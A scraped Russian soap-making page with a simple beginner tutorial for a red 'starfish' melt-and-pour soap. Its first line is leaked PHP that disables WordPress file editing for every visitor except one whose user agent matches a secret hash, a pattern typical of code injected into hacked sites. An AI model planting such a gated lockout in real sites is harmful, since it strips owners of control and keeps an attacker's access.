if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мастер-класс для начинающих: мыльце “Морская звезда” | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мастер-класс для начинающих: мыльце “Морская звезда”

Вспомните свой последний отдых на море... А теперь вложите воспоминания в это чудное мыльце!

Это мыло очень про­стое в изго­тов­ле­нии и подой­дет даже начи­на­ю­щим люби­те­лям мыло­ва­ре­ния. Создать такое мор­ское мыло в домаш­них усло­ви­ях под силу любо­му. Ингре­ди­ен­ты для этой звез­ды следующие:

  • про­зрач­ная мыль­ная основа
  • кра­си­тель (крас­ный)
  • отдуш­ка (луч­ше все­го «Оке­ан» или что-то подобное)
  • базо­вое мас­ло (в зави­си­мо­сти от типа кожи)

Осно­ву рас­тап­ли­ва­ем в емко­сти (в мик­ро­вол­нов­ке или на водя­ной бане), добав­ля­ем несколь­ко капель отдуш­ки и при­мер­но чай­ную лож­ку мас­ла, а затем вво­дим кра­си­тель. Выли­ва­ем в фор­му, через 10–15 минут доста­ем мыло.

мз2

мз3


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия Евланова

Уже давно увлекаюсь мыловарением. Вот нашла интересный сайт, где можно показать свои творения! Читайте все мои записи!